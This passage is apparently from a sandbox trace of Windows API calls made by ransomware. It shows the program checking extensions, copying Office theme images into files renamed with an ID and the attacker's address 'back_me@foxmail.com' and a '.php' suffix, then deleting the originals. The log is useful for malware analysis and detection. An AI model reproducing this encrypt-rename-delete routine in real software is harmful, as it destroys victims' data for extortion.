[0048.206] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0048.206] lstrlenW (lpString=".rar") returned 4 [0048.206] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0048.206] lstrlenW (lpString=".bz2") returned 4 [0048.206] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0048.206] lstrlenW (lpString=".7z") returned 3 [0048.206] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0048.206] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74 [0048.206] lstrlenW (lpString=".dbf") returned 4 [0048.206] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0048.206] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74 [0048.206] lstrlenW (lpString=".1cd") returned 4 [0048.206] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0048.207] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\PREVIEW.GIF") returned 74 [0048.207] lstrlenW (lpString=".jpg") returned 4 [0048.207] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0048.207] lstrcmpiW (lpString1=".PNG", lpString2=".php") returned 1 [0048.207] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0048.207] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0048.208] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=31975) returned 1 [0048.208] CloseHandle (hObject=0x210) returned 1 [0048.208] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\thmbnail.png")) returned 0x20 [0048.208] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0048.208] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0048.208] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.208] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.208] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0048.209] GetLastError () returned 0x0 [0048.209] ReadFile (in: hFile=0x210, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x7ce7, lpOverlapped=0x0) returned 1 [0048.213] WriteFile (in: hFile=0x1f8, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0x7cf0, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0x7cf0, lpOverlapped=0x0) returned 1 [0048.214] ReadFile (in: hFile=0x210, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x0, lpOverlapped=0x0) returned 1 [0048.214] WriteFile (in: hFile=0x1f8, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0xec, lpOverlapped=0x0) returned 1 [0048.214] SetEndOfFile (hFile=0x1f8) returned 1 [0048.215] CloseHandle (hObject=0x1f8) returned 1 [0048.215] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.215] SetEndOfFile (hFile=0x210) returned 1 [0048.216] CloseHandle (hObject=0x210) returned 1 [0048.216] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0048.216] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\thmbnail.png")) returned 1 [0048.216] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75 [0048.216] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75 [0048.216] lstrlenW (lpString=".doc") returned 4 [0048.216] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0048.216] lstrlenW (lpString=".docx") returned 5 [0048.216] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0048.216] lstrlenW (lpString=".pdf") returned 4 [0048.216] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0048.216] lstrlenW (lpString=".xls") returned 4 [0048.216] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0048.216] lstrlenW (lpString=".xlsx") returned 5 [0048.216] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0048.216] lstrlenW (lpString=".ppt") returned 4 [0048.216] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0048.216] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75 [0048.216] lstrlenW (lpString=".zip") returned 4 [0048.217] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0048.217] lstrlenW (lpString=".rar") returned 4 [0048.217] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0048.217] lstrlenW (lpString=".bz2") returned 4 [0048.217] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0048.217] lstrlenW (lpString=".7z") returned 3 [0048.217] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0048.217] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75 [0048.217] lstrlenW (lpString=".dbf") returned 4 [0048.217] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0048.217] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75 [0048.217] lstrlenW (lpString=".1cd") returned 4 [0048.217] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0048.217] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75 [0048.217] lstrlenW (lpString=".jpg") returned 4 [0048.217] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0048.217] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75 [0048.217] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75 [0048.217] lstrlenW (lpString=".doc") returned 4 [0048.217] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0048.217] lstrlenW (lpString=".docx") returned 5 [0048.217] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0048.217] lstrlenW (lpString=".pdf") returned 4 [0048.217] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0048.217] lstrlenW (lpString=".xls") returned 4 [0048.217] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0048.217] lstrlenW (lpString=".xlsx") returned 5 [0048.217] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0048.217] lstrlenW (lpString=".ppt") returned 4 [0048.217] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0048.217] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75 [0048.217] lstrlenW (lpString=".zip") returned 4 [0048.217] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0048.217] lstrlenW (lpString=".rar") returned 4 [0048.217] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0048.218] lstrlenW (lpString=".bz2") returned 4 [0048.218] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0048.218] lstrlenW (lpString=".7z") returned 3 [0048.218] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0048.218] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75 [0048.218] lstrlenW (lpString=".dbf") returned 4 [0048.218] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0048.218] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75 [0048.218] lstrlenW (lpString=".1cd") returned 4 [0048.218] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0048.218] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\THMBNAIL.PNG") returned 75 [0048.218] lstrlenW (lpString=".jpg") returned 4 [0048.218] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0048.218] lstrcmpiW (lpString1=".GIF", lpString2=".php") returned -1 [0048.218] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0048.218] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0048.487] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=4100) returned 1 [0048.487] CloseHandle (hObject=0x1b0) returned 1 [0048.487] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\preview.gif")) returned 0x20 [0048.487] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\preview.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0048.487] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0048.487] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.487] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.487] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\preview.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0048.488] GetLastError () returned 0x0 [0048.488] ReadFile (in: hFile=0x1b0, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x1004, lpOverlapped=0x0) returned 1 [0048.489] WriteFile (in: hFile=0x214, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0x1010, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0x1010, lpOverlapped=0x0) returned 1 [0048.490] ReadFile (in: hFile=0x1b0, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x0, lpOverlapped=0x0) returned 1 [0048.490] WriteFile (in: hFile=0x214, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0xea, lpOverlapped=0x0) returned 1 [0048.490] SetEndOfFile (hFile=0x214) returned 1 [0048.490] CloseHandle (hObject=0x214) returned 1 [0048.491] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.491] SetEndOfFile (hFile=0x1b0) returned 1 [0048.492] CloseHandle (hObject=0x1b0) returned 1 [0048.492] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0048.492] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\preview.gif")) returned 1 [0048.492] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75 [0048.492] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75 [0048.492] lstrlenW (lpString=".doc") returned 4 [0048.492] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0048.492] lstrlenW (lpString=".docx") returned 5 [0048.492] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0048.492] lstrlenW (lpString=".pdf") returned 4 [0048.492] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0048.492] lstrlenW (lpString=".xls") returned 4 [0048.492] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0048.492] lstrlenW (lpString=".xlsx") returned 5 [0048.492] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0048.492] lstrlenW (lpString=".ppt") returned 4 [0048.492] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0048.492] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75 [0048.492] lstrlenW (lpString=".zip") returned 4 [0048.492] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0048.493] lstrlenW (lpString=".rar") returned 4 [0048.493] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0048.493] lstrlenW (lpString=".bz2") returned 4 [0048.493] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0048.493] lstrlenW (lpString=".7z") returned 3 [0048.493] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0048.493] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75 [0048.493] lstrlenW (lpString=".dbf") returned 4 [0048.493] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0048.493] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75 [0048.493] lstrlenW (lpString=".1cd") returned 4 [0048.493] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0048.493] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75 [0048.493] lstrlenW (lpString=".jpg") returned 4 [0048.493] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0048.493] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75 [0048.493] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75 [0048.493] lstrlenW (lpString=".doc") returned 4 [0048.493] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0048.493] lstrlenW (lpString=".docx") returned 5 [0048.493] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0048.493] lstrlenW (lpString=".pdf") returned 4 [0048.493] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0048.493] lstrlenW (lpString=".xls") returned 4 [0048.493] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0048.493] lstrlenW (lpString=".xlsx") returned 5 [0048.493] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0048.493] lstrlenW (lpString=".ppt") returned 4 [0048.493] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0048.493] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75 [0048.493] lstrlenW (lpString=".zip") returned 4 [0048.493] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0048.493] lstrlenW (lpString=".rar") returned 4 [0048.493] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0048.494] lstrlenW (lpString=".bz2") returned 4 [0048.494] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0048.494] lstrlenW (lpString=".7z") returned 3 [0048.494] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0048.494] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75 [0048.494] lstrlenW (lpString=".dbf") returned 4 [0048.494] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0048.494] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75 [0048.494] lstrlenW (lpString=".1cd") returned 4 [0048.494] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0048.494] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75 [0048.494] lstrlenW (lpString=".jpg") returned 4 [0048.494] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0048.494] lstrcmpiW (lpString1=".GIF", lpString2=".php") returned -1 [0048.494] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0048.494] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0048.495] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=1009) returned 1 [0048.495] CloseHandle (hObject=0x1b0) returned 1 [0048.495] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\preview.gif")) returned 0x20 [0048.495] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\preview.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0048.496] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0048.496] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.496] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.496] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\preview.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0048.497] GetLastError () returned 0x0 [0048.497] ReadFile (in: hFile=0x1b0, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x3f1, lpOverlapped=0x0) returned 1 [0048.499] WriteFile (in: hFile=0x214, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0x400, lpOverlapped=0x0) returned 1 [0048.500] ReadFile (in: hFile=0x1b0, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x0, lpOverlapped=0x0) returned 1 [0048.500] WriteFile (in: hFile=0x214, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0xea, lpOverlapped=0x0) returned 1 [0048.500] SetEndOfFile (hFile=0x214) returned 1 [0048.500] CloseHandle (hObject=0x214) returned 1 [0048.500] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.500] SetEndOfFile (hFile=0x1b0) returned 1 [0048.501] CloseHandle (hObject=0x1b0) returned 1 [0048.501] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0048.501] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\preview.gif")) returned 1 [0048.502] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73 [0048.502] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73 [0048.502] lstrlenW (lpString=".doc") returned 4 [0048.502] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0048.502] lstrlenW (lpString=".docx") returned 5 [0048.502] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0048.502] lstrlenW (lpString=".pdf") returned 4 [0048.502] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0048.502] lstrlenW (lpString=".xls") returned 4 [0048.502] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0048.502] lstrlenW (lpString=".xlsx") returned 5 [0048.502] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0048.502] lstrlenW (lpString=".ppt") returned 4 [0048.502] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0048.502] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73 [0048.502] lstrlenW (lpString=".zip") returned 4 [0048.502] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0048.502] lstrlenW (lpString=".rar") returned 4 [0048.502] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0048.502] lstrlenW (lpString=".bz2") returned 4 [0048.502] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0048.502] lstrlenW (lpString=".7z") returned 3 [0048.502] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0048.502] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73 [0048.502] lstrlenW (lpString=".dbf") returned 4 [0048.502] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0048.502] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73 [0048.502] lstrlenW (lpString=".1cd") returned 4 [0048.502] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0048.502] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73 [0048.502] lstrlenW (lpString=".jpg") returned 4 [0048.503] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0048.503] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73 [0048.503] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73 [0048.503] lstrlenW (lpString=".doc") returned 4 [0048.503] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0048.503] lstrlenW (lpString=".docx") returned 5 [0048.503] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0048.503] lstrlenW (lpString=".pdf") returned 4 [0048.503] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0048.503] lstrlenW (lpString=".xls") returned 4 [0048.503] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0048.503] lstrlenW (lpString=".xlsx") returned 5 [0048.503] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0048.503] lstrlenW (lpString=".ppt") returned 4 [0048.503] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0048.503] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73 [0048.503] lstrlenW (lpString=".zip") returned 4 [0048.503] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 